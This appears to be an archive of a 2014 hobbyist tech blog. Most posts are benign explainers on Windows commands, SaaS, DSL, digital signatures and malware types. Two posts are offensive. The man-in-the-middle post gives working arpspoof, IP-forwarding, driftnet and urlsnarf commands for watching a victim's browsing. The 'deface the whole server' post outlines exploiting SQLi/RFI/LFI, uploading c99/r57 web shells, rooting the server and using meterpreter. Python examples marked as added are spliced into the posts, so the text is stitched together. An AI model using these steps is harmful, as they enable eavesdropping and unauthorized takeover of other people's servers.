Sunday 24 August 2014

Command Prompt Short Keys

F1: Pastes the last executed command
(character by character)
F2: Pastes the last executed command (up to
the entered character)
F3: Pastes the last executed command
F4: Deletes current prompt text up to the
entered character
F5: Pastes recently executed commands
(does not cycle)
F6: Pastes ^Z to the prompt
F7: Displays a selectable list of previously
executed commands
F8: Pastes recently executed commands
(cycles)
F9: Asks for the number of the command
from the F7 list to paste

SAAS ( Software as a service )

Software as a service is a software licensing
and delivery model in which software is
licensed on a subscription basis and is
centrally hosted. It is sometimes referred to
as "on-demand software". SaaS is typically
accessed by users using a thin client via a
web browser. SaaS has become a common
delivery model for many business
applications, including office & messaging
software, DBMS software, management
software, CAD software, development
software, gamification, virtualization,
accounting, collaboration, customer
relationship management (CRM), management
information systems (MIS), enterprise
resource planning (ERP), invoicing, human
resource management (HRM), content
management (CM) and service desk
management. SaaS has been incorporated
into the strategy of all leading enterprise
software companies. One of the biggest
selling points for these companies is the
potential to reduce IT support costs by
outsourcing hardware and software
maintenance and support to the SaaS
provider.
According to a Gartner Group estimate, SaaS
sales in 2010 reached $10 billion, and were
projected to increase to $12.1bn in 2011, up
20.7% from 2010. Gartner Group estimates
that SaaS revenue will be more than double
its 2010 numbers by 2015 and reach a
projected $21.3bn. Customer relationship
management (CRM) continues to be the
largest market for SaaS. SaaS revenue within
the CRM market was forecast to reach
$3.8bn in 2011, up from $3.2bn in 2010.
The term "software as a service" (SaaS) is
considered to be part of the nomenclature of
cloud computing, along with infrastructure as
a service (IaaS), platform as a service (PaaS),
desktop as a service (DaaS), backend as a
service (BaaS), and information technology
management as a service (ITMaaS).

10+ linux OS for hacking-

1. Kali Linux - http://www.kali.org/
2. BackBox - http://www.backbox.org/
3. DEFT - http://www.deftlinux.net/
4. Live Hacking OS - https://www.livehacking.com/
5. Samurai Web Security Framework - http://sourceforge.net/projects/samurai/
6. Network Security Tool Kit - http://sourceforge.net/projects/nst/
7. Parrot-sec Forensic OS - http://www.parrotsec.org/index.php/Main_Page
8. Bugtraq - http://bugtraq-team.com/
9. Nodezero - http://www.nodezero-linux.org/
10. Pentoo - http://www.pentoo.ch/
11. Gnacktrack - http://www.gnacktrack.co.uk/

Monday 18 August 2014

Man in the middle attack-

The man-in-the-middle attack (MITM, MIM,
MITMA) in cryptography and computer security is a form of active eavesdropping in
which the attacker makes independent connections with the victims and relays messages between them, making them
believe that they are talking directly to each other over a private connection, when in fact
the entire conversation is controlled by the attacker. In other words, the attacker sits between the two
victims and watches their messages.
Required tools-
1. Arpspoof
2. Driftnet
3. Urlsnarf
Arpspoof:- We use it twice:
1. To lie to the Gateway about the MAC address of the Victim (the Gateway is told that the Victim's MAC address is BackTrack's)
2. To lie to the Victim about the MAC address of the Gateway (the Victim is told that the Gateway's MAC address is BackTrack's)
Driftnet:- Displays the graphics that the Victim browses over the Internet
Urlsnarf:- Gives the details of the URLs that the Victim visits
Steps for that attack-
1) To accomplish this we will modify the IP
Tables and turn Linux into a router.
cat /proc/sys/net/ipv4/ip_forward
2) The default value is "0". It should be set
to 1. To change the value to 1, enter the
following command:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
3) Now check the ip_forward file again and
make sure the value equals "1":
cat /proc/sys/net/ipv4/ip_forward
4) An ARP poisoning attack will cause data
going from the victim's PC to their gateway
to be redirected to our box (note: you have to
be on the same physical device, such as a
switch or access point, to accomplish this).
sudo arpspoof -i eth1 -t 192.168.1.138 192.168.1.1
5) We will now use another ARP poisoning
attack to redirect data from the gateway
destined for the victim's PC back to our
Linux box.
sudo arpspoof -i eth1 -t 192.168.1.1 192.168.1.137
6) Now we launch driftnet. It is listening.
sudo driftnet -i eth1
7) As the victim's PC browses the Internet,
images that show up in the victim's web browser are
also displayed on the attacker's Linux server.
8) The attacker PC launches urlsnarf. URLs
that are accessed on the victim's PC are
displayed on the attacker's Linux server.
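
Seen from the defending side, the two arpspoof steps leave a trace in the neighbour (ARP) tables: the gateway's IP suddenly resolves to a different MAC address, and that MAC is shared with another host. The Python sketch below is an added example, not part of the original post; it compares two `ip neigh show` snapshots, and the function names, sample tables and MAC addresses are constructed for illustration.

```python
"""Added example: spot ARP-cache poisoning in `ip neigh show` snapshots."""
import re
from collections import defaultdict

# Matches IPv4 neighbour entries such as:
#   192.168.1.1 dev eth1 lladdr 00:1a:2b:3c:4d:5e REACHABLE
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+"
    r"lladdr\s+(?P<mac>[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\b"
)


def parse_neigh(text):
    """Return {ip: mac} for every entry that carries a link-layer address."""
    table = {}
    for line in text.splitlines():
        match = NEIGH_RE.match(line.strip())
        if match:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[match.group("ip")] = match.group("mac").lower()
    return table


def find_poisoning(baseline, current, gateway_ip):
    """Compare a trusted baseline table with the current one.

    Returns a list of (severity, rule, subject, detail) tuples.
    """
    findings = []

    # Rule 1: an IP that used to resolve to one MAC now resolves to another.
    for ip in sorted(current):
        old, new = baseline.get(ip), current[ip]
        if old is not None and old != new:
            severity = "high" if ip == gateway_ip else "medium"
            findings.append((severity, "mac-changed", ip, f"{old} -> {new}"))

    # Rule 2: one MAC answers for several IPs. When the gateway is among
    # them, this is the state the post describes (gateway MAC == attacker MAC).
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac in sorted(by_mac):
        ips = sorted(by_mac[mac])
        if len(ips) > 1:
            severity = "high" if gateway_ip in ips else "medium"
            findings.append((severity, "shared-mac", mac, ",".join(ips)))

    return findings


GATEWAY_IP = "192.168.1.1"  # gateway address used in the post

# Constructed sample data: a known-good snapshot and a later snapshot in
# which the gateway entry has been overwritten with another host's MAC.
BASELINE = """\
192.168.1.1 dev eth1 lladdr 00:1a:2b:3c:4d:5e REACHABLE
192.168.1.50 dev eth1 lladdr 08:00:27:11:22:33 STALE
192.168.1.77 dev eth1 lladdr 08:00:27:44:55:66 STALE
192.168.1.90 dev eth1  FAILED
"""
CURRENT = """\
192.168.1.1 dev eth1 lladdr 08:00:27:11:22:33 REACHABLE
192.168.1.50 dev eth1 lladdr 08:00:27:11:22:33 REACHABLE
192.168.1.77 dev eth1 lladdr 08:00:27:44:55:66 STALE
"""


def check_samples():
    """Run the detector over the constructed snapshots above."""
    return find_poisoning(parse_neigh(BASELINE), parse_neigh(CURRENT), GATEWAY_IP)


if __name__ == "__main__":
    for finding in check_samples():
        print(*finding, sep="\t")
```

A changed or shared gateway MAC can also come from a router swap, proxy ARP or a failover pair, so findings are leads to confirm. Static ARP entries for the gateway, or Dynamic ARP Inspection on the switch, prevent the poisoning itself.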

Ten hacking tools for android

1.SpoofApp
SpoofApp is a Caller ID Spoofing, Voice
Changing and Call Recording mobile app for
your iPhone, BlackBerry and Android phone.
It's a decent mobile app to help protect your
privacy on the phone. However, it has been
banned from the Play Store for allegedly
being in conflict with The Truth in Caller ID
Act of 2009.

2.Andosid
The DOS tool for Android Phones allows
security professionals to simulate a DOS
attack (an http post flood attack to be exact)
and of course a dDOS on a web server, from
mobile phones.

3.Faceniff
Allows you to sniff and intercept web session
profiles over the WiFi that your mobile is
connected to. It is possible to hijack sessions
only when WiFi is not using EAP, but it
should work over any private networks.

4.Nmap
Nmap (Network Mapper) is a security
scanner originally written by Gordon Lyon
used to discover hosts and services on a
computer network, thus creating a "map" of
the network. To accomplish its goal, Nmap
sends specially crafted packets to the target
host and then analyses the responses.

5.Anti-Android Network Toolkit
zANTI is a comprehensive network
diagnostics toolkit that enables complex
audits and penetration tests at the push of a
button. It provides cloud-based reporting
that walks you through simple guidelines to
ensure network safety.

6.SSHDroid
SSHDroid is a SSH server implementation for
Android. This application will let you connect
to your device from a PC and execute
commands (like "terminal" and "adb shell")
or edit files (through SFTP, WinSCP,
Cyberduck, etc).

7.WiFi Analyser
Turns your android phone into a Wi-Fi
analyser. Shows the Wi-Fi channels around
you. Helps you to find a less crowded
channel for your wireless router.

8.Network Discovery
Discover hosts and scan their ports in your
Wifi network. A great tool for testing your
network security.

9.ConnectBot
ConnectBot is a powerful open-source
Secure Shell (SSH) client. It can manage
simultaneous SSH sessions, create secure
tunnels, and copy/paste between other
applications. This client allows you to
connect to Secure Shell servers that typically
run on UNIX-based servers.

10.dSploit
Android network analysis and penetration
suite offering the most complete and
advanced professional toolkit to perform
network security assessments on a mobile
device.

Sunday 17 August 2014

What is a digital signature?

Part 1
There are different types of digital
signatures; this tip focuses on digital
signatures for email messages. You may have
received emails that have a block of letters
and numbers at the bottom of the message.
Although it may look like useless text or
some kind of error, this information is
actually a digital signature. To generate a
signature, a mathematical algorithm is used
to combine the information in a key with the
information in the message. The result is a
random-looking string of letters and
numbers.
Why would you use one?
Because it is so easy for attackers and
viruses to "spoof" email addresses, it is
sometimes difficult to identify legitimate
messages. Authenticity may be especially
important for business correspondence—if
you are relying on someone to provide or
verify information, you want to be sure that
the information is coming from the correct
source. A signed message also indicates that
changes have not been made to the content
since it was sent; any changes would cause
the signature to break.
How does it work?
Before you can understand how a digital
signature works, there are some terms you
should know:
Keys - Keys are used to create digital
signatures. For every signature, there is a
public key and a private key.
Private key - The private key is the portion of
the key you use to actually sign an email
message. The private key is protected by a
password, and you should never give your
private key to anyone.
Public key - The public key is the portion of
the key that is available to other people.
Whether you upload it to a public key ring
or send it to someone, this is the key other
people can use to check your signature. A
list of other people who have signed your
key is also included with your public key.
You will only be able to see their identities if
you already have their public keys on your
key ring.
Key ring - A key ring contains public keys.
You have a key ring that contains the keys of
people who have sent you their keys or
whose keys you have gotten from a public
key server. A public key server contains keys
of people who have chosen to upload their
keys.

What is a digital signature? Part 2

Fingerprint - When confirming a key, you will
actually be confirming the unique series of
letters and numbers that comprise the
fingerprint of the key. The fingerprint is a
different series of letters and numbers than
the chunk of information that appears at the
bottom of a signed email message.
Key certificates - When you select a key on a
key ring, you will usually see the key
certificate, which contains information about
the key, such as the key owner, the date the
key was created, and the date the key will
expire.
"Web of trust" - When someone signs your
key, they are confirming that the key
actually belongs to you. The more signatures
you collect, the stronger your key becomes.
If someone sees that your key has been
signed by other people that he or she trusts,
he or she is more inclined to trust your key.
Note: Just because someone else has trusted
a key or you find it on a public key ring does
not mean you should automatically trust it.
You should always verify the fingerprint
yourself.
The process for creating, obtaining, and
using keys is fairly straightforward:
1. Generate a key using software such as PGP, which stands for Pretty Good Privacy, or GnuPG, which stands for GNU Privacy Guard.
2. Increase the authenticity of your key by having your key signed by co-workers or other associates who also have keys. In the process of signing your key, they will confirm that the fingerprint on the key you sent them belongs to you. By doing this, they verify your identity and indicate trust in your key.
3. Upload your signed key to a public key ring so that if someone gets a message with your signature, they can verify the digital signature.
4. Digitally sign your outgoing email messages. Most email clients have a feature to easily add your digital signature to your message.
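
To make the terms from Part 1 and Part 2 concrete, the Python sketch below is an added example (not from the original tip, and not how PGP or GnuPG is implemented): a toy textbook-RSA hash-then-sign scheme showing that a changed message breaks the signature, and that a signature made with a substitute key verifies fine unless the fingerprint is compared. The key pairs, names, message and the simplified fingerprint format are all constructed assumptions.

```python
"""Added example: toy hash-then-sign, NOT PGP/GnuPG and NOT secure."""
import hashlib

E = 65537  # public exponent


def make_keypair(p, q):
    """Build a textbook-RSA (public, private) pair from two primes."""
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))  # modular inverse, Python 3.8+
    return {"n": n, "e": E}, {"n": n, "d": d}


def digest_int(message):
    """Hash the message; the signature covers this digest, not the raw text."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big")


def sign(private_key, message):
    """Combine the private key with the message digest."""
    return pow(digest_int(message), private_key["d"], private_key["n"])


def verify(public_key, message, signature):
    """Anyone holding the public key can check the signature."""
    recovered = pow(signature, public_key["e"], public_key["n"])
    return recovered == digest_int(message)


def fingerprint(public_key):
    """Short hash of the public key, compared over a second channel.

    Simplified for the demo: real OpenPGP fingerprints hash a defined
    key-packet encoding, not this ad-hoc string.
    """
    material = f"{public_key['n']:x}:{public_key['e']:x}".encode()
    hexdigest = hashlib.sha256(material).hexdigest().upper()
    return " ".join(hexdigest[i:i + 4] for i in range(0, 40, 4))


# Constructed keys built from publicly known Mersenne primes: fine for a
# demo, useless for security. Real keys come from PGP/GnuPG key generation.
ALICE_PUB, ALICE_PRIV = make_keypair(2**521 - 1, 2**607 - 1)
IMPOSTOR_PUB, IMPOSTOR_PRIV = make_keypair(2**1279 - 1, 2**2203 - 1)

MESSAGE = b"Please pay invoice 4471 for 100 EUR."  # constructed sample


def run_demo():
    """Sign, tamper, and substitute a key; return what each check reports."""
    signature = sign(ALICE_PRIV, MESSAGE)
    tampered = MESSAGE.replace(b"100", b"900")
    forged_signature = sign(IMPOSTOR_PRIV, tampered)
    return {
        # The untouched message verifies under the real public key.
        "genuine_ok": verify(ALICE_PUB, MESSAGE, signature),
        # Any change to the content breaks the signature.
        "tampered_ok": verify(ALICE_PUB, tampered, signature),
        # A signature from another key fails under the real public key ...
        "forged_under_real_key": verify(ALICE_PUB, tampered, forged_signature),
        # ... but passes if the recipient accepted the substitute key,
        "forged_under_impostor_key": verify(IMPOSTOR_PUB, tampered, forged_signature),
        # which is exactly what comparing fingerprints catches.
        "fingerprints_match": fingerprint(ALICE_PUB) == fingerprint(IMPOSTOR_PUB),
    }


if __name__ == "__main__":
    print("Alice   :", fingerprint(ALICE_PUB))
    print("Impostor:", fingerprint(IMPOSTOR_PUB))
    for check, result in run_demo().items():
        print(f"{check}: {result}")
```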

ABCD... OF CYBERS

A-Apple
B-Bluetooth
C-Chatting
D-Download
E-Email
F-Facebook
G-Google
H-Hotmail
I-Iphone
J-Java
K-Kingston
L-Laptop
M-Message
N-Nero
O-Orkut
P-Picasa
Q-Quick time
R-RAM
S-Server
T-TechNotification
U-USB
V-Vista
W-Wifi
X-XP
Y-Yahoo!
Z-Zorpia.

Some Useful Run Short Commands

Example: Go > Run > type control.exe admintools
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control.exe admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (if installed)
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control.exe desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab
Preselected)
control.exe color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control.exe folders
Fonts
control.exe fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
Java Control Panel (if installed)
jpicpl32.cpl
Java Control Panel (if installed)
javaws
Keyboard Properties
control.exe keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Microsoft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control.exe mouse
Mouse Properties
main.cpl
Network Connections
control.exe netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Nview Desktop Manager (if installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (if installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control.exe printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedt32
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy
rsop.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control.exe schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitaire Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility
sfc
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
write

Tuesday 12 August 2014

32 bit vs 64 Bit ( For Windows users & System Administrators )

Technically x86 simply refers to a family of
processors and the instruction set they all
use. It doesn't actually say anything specific
about data sizes.
x86 started out as a 16-bit instruction set
for 16-bit processors (the 8086 and 8088
processors), then was extended to a 32-bit
instruction set for 32-bit processors (80386
and 80486), and now has been extended to a
64-bit instruction set for 64-bit processors.
It used to be written as 80x86 to reflect the
changing value in the middle of the chip
model numbers, but somewhere along the
line the 80 in the front was dropped, leaving
just x86.
Blame the Pentium and its offspring for
changing the way in which processors were
named and marketed, although all newer
processors using Intel's x86 instruction set
are still referred to as x86, i386, or i686
compatible (which means they all use
extensions of the original 8086 instruction
set).
x64 is really the odd man out here. The first
name for the 64-bit extension to the x86 set
was called x86-64. It was later renamed
AMD64 (because AMD were the ones to come
up with the 64-bit extension originally). Intel
licensed the 64-bit instruction set and
named their version EM64T. Both instruction
sets and the processors that use them are all
still considered x86.
System requirements
32 bit :- 1-gigahertz (GHz) 32-bit (x86)
processor or 64-bit (x64) processor, 512 MB
of RAM
64 bit :- 1-GHz 64-bit (x64) processor, 1 GB
of RAM (4 GB recommended)
Memory access
32 bit :- A 32-bit version of Windows Vista
can access up to 4 GB of RAM.
64 bit :- A 64-bit version of Windows Vista
can access from 1 GB of RAM to more than
128 GB of RAM.
Memory access per edition
32 bit :- All 32-bit versions of Windows Vista
can access up to 4 GB of RAM.
64 bit :- Windows Vista Home Basic – 8 GB
of RAM
Windows Vista Home Premium – 16 GB of
RAM
Windows Vista Business – 128 GB of RAM or
more
Windows Vista Enterprise – 128 GB of RAM
or more
Windows Vista Ultimate – 128 GB of RAM or
more
DEP
32-bit versions of Windows Vista use a
software-based version of DEP.
64-bit versions of Windows Vista support
hardware-backed DEP.
Kernel Patch Protection (PatchGuard)
32 bit :- This feature is not available in 32-
bit versions of Windows Vista.
64 bit :- This feature is available in 64-bit
versions of Windows Vista. Kernel Patch
Protection helps prevent a malicious
program from updating the Windows Vista
kernel. This feature works by helping to
prevent a kernel-mode driver from extending
or replacing other kernel services. Also, this
feature helps prevent third-party programs
from updating (patching) any part of the
kernel.
Driver signing
32-bit versions of Windows Vista support 32-
bit drivers that are designed for Windows
Vista.
64-bit versions of Windows Vista do not
support 32-bit device drivers.
16-bit program support
32-bit versions of Windows Vista support 16-
bit programs, in part.
64-bit versions of Windows Vista do not
support 16-bit programs.
Note:-
If you value the benefits and advantages of
switching and embracing 64-bit Windows
Vista, here are a few considerations to ponder
before making the move to install x64
Windows Vista:
64-bit device drivers may not be available
for one or more devices in the computer.
Device drivers must be digitally signed.
32-bit device drivers are not supported.
32-bit programs may not be fully compatible
with a 64-bit operating system.
It may be difficult to locate programs that
are written specifically for a 64-bit operating
system.
Not all hardware devices may be compatible
with a 64-bit version of Windows Vista.

Computer threats Malware, Spyware, Virus, Worm , Bot , Backdoor

Virus – this is a term that used to be generic.
Any bad software used to be a virus;
however, we use the term “malware” now.
We use the word “virus” to describe a
program that self-replicates after hooking
itself onto something running in Windows®.
Worm – a worm is another kind of self-
replicating program but generally doesn’t
hook itself onto a Windows process. Worms
generally are little programs that run in the
background of your system.
Trojan – software that you thought was going
to be one thing, but turns out to be
something bad. Named for the fabled “Trojan
Horse” that appeared to be a gift but in fact
carried a dangerous payload.
Drive-by download – this is probably the
most popular way to get something nasty
into your computer. Most of the time, it
comes from visiting a bad web page. That
web page exploits a weakness in your
browser and causes your system to become
infected.
Malware Actions
Malware:
This is a big catchall phrase that covers all
sorts of software with nasty intent. Not
buggy software, not programs you don’t like,
but software which is specifically written
with the intent to harm.
Once malware is in your computer, it can do
many things. Sometimes it’s only trying to
replicate itself with no harm to anyone, other
times it’s capable of doing very nasty things.
Adware – not truly malware and almost
never delivered using one of the methods
above. Adware is software that uses some
form of advertising delivery system.
Sometimes the way that advertisements are
delivered can be deceptive in that they track
or reveal more information about you than
you would like. Most of the time, you agree
to the adware tracking you when you install
the software that it comes with. Generally, it
can be removed by uninstalling the software
it was attached to.
Spyware – software that monitors your
computer and reveals collected information
to an interested party. This can be benign
when it tracks what webpages you visit; or it
can be incredibly invasive when it monitors
everything you do with your mouse and
keyboard.
Ransomware – lately a very popular way for
Internet criminals to make money. This
malware alters your system in such a way
that you’re unable to get into it normally. It
will then display some kind of screen that
demands some form of payment to have the
computer unlocked. Access to your computer
is literally ransomed by the cyber-criminal.
Scareware – software that appears to be
something legit (usually masquerading as
some tool to help fix your computer) but
when it runs it tells you that your system is
either infected or broken in some way. This
message is generally delivered in a manner
that is meant to frighten you into doing
something. The software claims to be able to
fix your problems if you pay them.
Scareware is also referred to as “rogue”
software – like rogue antivirus.
Bots
"Bot" is derived from the word "robot" and
is an automated process that interacts with
other network services. Bots often automate
tasks and provide information or services
that would otherwise be conducted by a
human being. A typical use of bots is to
gather information (such as web crawlers),
or interact automatically with instant
messaging (IM), Internet Relay Chat (IRC), or
other web interfaces. They may also be used
to interact dynamically with websites.
Bots can be used for either good or
malicious intent. A malicious bot is self-
propagating malware designed to infect a
host and connect back to a central server or
servers that act as a command and control
(C&C) center for an entire network of
compromised devices, or "botnet." With a
botnet, attackers can launch broad-based,
"remote-control," flood-type attacks against
their target(s). In addition to the worm-like
ability to self-propagate, bots can include the
ability to log keystrokes, gather passwords,
capture and analyze packets, gather financial
information, launch DoS attacks, relay spam,
and open back doors on the infected host.
Bots have all the advantages of worms, but
are generally much more versatile in their
infection vector, and are often modified
within hours of publication of a new exploit.
They have been known to exploit back doors
opened by worms and viruses, which allows
them to access networks that have good
perimeter control. Bots rarely announce
their presence with high scan rates, which
damage network infrastructure; instead they
infect networks in a way that escapes
immediate notice.
Exploit
An exploit is a piece of software, a
command, or a methodology that attacks a
particular security vulnerability. Exploits are
not always malicious in intent—they are
sometimes used only as a way of
demonstrating that a vulnerability exists.
However, they are a common component of
malware.
Back Door
A back door is an undocumented way of
accessing a system, bypassing the normal
authentication mechanisms. Some back doors
are placed in the software by the original
programmer and others are placed on
systems through a system compromise, such
as a virus or worm. Usually, attackers use
back doors for easier and continued access
to a system after it has been compromised.

Meaning of HTTP Status Codes

HTTP, Hypertext Transfer Protocol, is the
method by which clients (i.e. you) and servers
communicate. When someone clicks a link,
types in a URL or submits a form, their
browser sends a request to a server for
information. It might be asking for a page, or
sending data, but either way, that is called
an HTTP Request. When a server receives that
request, it sends back an HTTP Response, with
information for the client.
Usually, this is invisible, though I'm sure
you've seen one of the very common Response
codes - 404, indicating a page was not found.
There are a fair few more status codes sent
by servers, and the following is a list of the
current ones in HTTP 1.1, along with an
explanation of their meanings.

Acunetix

Acunetix has a free and paid version. This
hacking tool has many uses but in essence it
tests and reports on SQL injection and Cross
Site scripting testing. It has a state of the art
crawler technology which includes a client
script analyzer engine. This security tool
generates detailed reports that identify
security issues and vulnerabilities. The latest
version, Acunetix WVS version 8, includes
several security features such as a new
module that tests slow HTTP Denial of
Service. This latest version also ships with a
compliance report template for ISO 27001.
This is useful for penetration testers and
developers since it allows organizations to
validate that their web applications are ISO
27001 compliant.

Aircrack-ng

Aircrack-ng is a comprehensive set of
network security tools that includes
aircrack-ng (which can crack WEP and WPA
(dictionary attacks)), airdecap-ng (which can
decrypt WEP or WPA encrypted capture
files), airmon-ng (which places network cards
into monitor mode, for example when using
the Alfa Security Scanner with rtl8187),
aireplay-ng (which is a packet injector),
airodump-ng (which is a packet sniffer),
airtun-ng (which allows for virtual tunnel
interfaces), airolib-ng (which stores and
manages ESSID and password lists),
packetforge-ng (which can create encrypted
packets for injection), airbase-ng (which
incorporates techniques for attacking clients)
and airdecloak-ng (which removes WEP
cloaking). Other tools include airdriver-ng (to
manage wireless drivers), airolib-ng (to store
and manage ESSID and password lists and
compute Pairwise Master Keys), airserv-ng
(which allows the penetration tester to
access the wireless card from other
computers). Airolib-ng is similar to easside-
ng which allows the user to run tools on a
remote computer, easside-ng (permits a
means to communicate to an access point,
without the WEP key), tkiptun-ng (for WPA/
TKIP attacks) and wesside-ng (which is an
automatic tool for recovering WEP keys).
Like most of the security tools in our list,
Aircrack also has a GUI interface, called
Gerix Wifi Cracker. Gerix is a freely licensed
security tool under the GNU General Public
License and is bundled within penetration
testing Linux distributions such as Kali Linux,
BackTrack and BackBox. The Gerix GUI has
several penetration testing tools that allow
for network analysis, wireless packet
capturing, and SQL packet injection.

Wireshark

Wireshark has been around for ages and is
extremely popular. Wireshark allows the
pentester to put a network interface into a
promiscuous mode and therefore see all
traffic. This tool has many features such as
being able to capture data from live network
connection or read from a file of
already-captured packets. Wireshark is able
to read data from a wide variety of
networks, from Ethernet, IEEE 802.11, PPP,
and even loopback. Like most tools in our
2013 Concise Courses Security List the
captured network data can be monitored and
managed via a GUI – which also allows for
plug-ins to be inserted and used. Wireshark
can also capture VoIP packets and raw USB
traffic.

How to deface the whole server

There are two types of server:
1-shared server
2-independent server
On a shared server there are a lot of websites
running on that server; that's why hacking all
the websites is easier.
For a mass deface, firstly we find the vuln
website (sqli, rfi, lfi);
after that you can upload your shell
(c99, r57).
Then, if it is a Linux server, you can
symlink the server or root the server by
using netcat.
If it is a Windows server, you can use
metasploit:
for that you create a vuln file and
execute it by the shell. After that you get
meterpreter, and by using that you have full
access to all websites for deface.

What is the difference between a domain, a workgroup, and a homegroup? Domains, workgroups, and homegroups

They represent different methods for organizing
computers in networks. The main difference
among them is how the computers and other
resources on the networks are managed.
Computers running Windows on a network
must be part of a workgroup or a domain.
Computers running Windows on home
networks can also be part of a homegroup,
but it's not required.
Computers on home networks are usually
part of a workgroup and possibly a
homegroup, and computers on workplace
networks are usually part of a domain.
In a workgroup:
============
All computers are peers; no computer has
control over another computer.
Each computer has a set of user accounts. To
log on to any computer in the workgroup,
you must have an account on that computer.
There are typically no more than twenty
computers.
A workgroup is not protected by a password.
All computers must be on the same local
network or subnet.
In a homegroup:
=============
Computers on a home network must belong
to a workgroup, but they can also belong to
a homegroup. A homegroup makes it easy to
share pictures, music, videos, documents,
and printers with other people on a home
network.
A homegroup is protected with a password,
but you only need to type the password
once, when adding your computer to the
homegroup.
In a domain:
==========
One or more computers are servers. Network
administrators use servers to control the
security and permissions for all computers
on the domain. This makes it easy to make
changes because the changes are
automatically made to all computers. Domain
users must provide a password or other
credentials each time they access the
domain.
If you have a user account on the domain,
you can log on to any computer on the
domain without needing an account on that
computer.
You probably can make only limited changes
to a computer's settings because network
administrators often want to ensure
consistency among computers.
There can be thousands of computers in a
domain.
The computers can be on different local
networks.
==========================================
Note: Info based on and copied from the MS
official website. For more, you can visit and
learn from the Microsoft website.
===========================================

Asymmetric digital subscriber line ( ADSL ) & Digital subscriber line (DSL )

Asymmetric digital subscriber line (ADSL) is a
type of digital subscriber line (DSL)
technology, a data communications
technology that enables faster data
transmission over copper telephone lines
than a conventional voiceband modem can
provide. It does this by utilizing frequencies
that are not used by a voice telephone call. A
splitter, or DSL filter, allows a single
telephone connection to be used for both
ADSL service and voice calls at the same
time. ADSL can generally only be distributed
over short distances from the telephone
exchange (the last mile).
Note: typically less than 4 kilometres (2
mi), but it has been known to exceed 8
kilometres (5 mi) if the originally laid wire
gauge allows for further distribution.
At the telephone exchange the line generally
terminates at a digital subscriber line access
multiplexer (DSLAM) where another
frequency splitter separates the voice band
signal for the conventional phone network.
Data carried by the ADSL are typically routed
over the telephone company's data network
and eventually reach a conventional Internet
Protocol network.
ADSL (Asymmetric Digital Subscriber Line)
uses an ordinary phone line to deliver a
high-speed Internet connection. It does this
by converting the data from your computer
into high-frequency signals. These high-
frequency signals can travel along a
telephone cable at the same time as a voice
call because the ADSL and voice signals use
different frequency ranges.
Digital subscriber line (DSL; originally digital
subscriber loop) is a family of technologies
that provide internet access by transmitting
digital data using a local telephone network
which uses the Public switched telephone
network. In telecommunications marketing,
the term DSL is widely understood to mean
asymmetric digital subscriber line (ADSL), the
most commonly installed DSL technology.
DSL service is delivered simultaneously with
wired telephone service on the same
telephone line. This is possible because DSL
uses higher frequency bands for data. On the
customer premises, a DSL filter on each non-
DSL outlet blocks any high frequency
interference, to enable simultaneous use of
the voice and DSL services.
The bit rate of consumer DSL services
typically ranges from 256 kbit/s to over 100
Mbit/s in the direction to the customer
(downstream), depending on DSL technology,
line conditions, and service-level
implementation. Bit rates of 1 Gbit/s have
been reached in trials. In ADSL, the data
throughput in the upstream direction, (the
direction to the service provider) is lower,
hence the designation of asymmetric service.
Note:- In symmetric digital subscriber line
(SDSL) services, the downstream and
upstream data rates are equal.
Researchers at Bell Labs have reached
broadband speeds of 10Gbps, while
delivering 1Gbit/s symmetrical ultra-
broadband access services using traditional
copper telephone lines. These speeds can be
achieved with existing telephone lines and
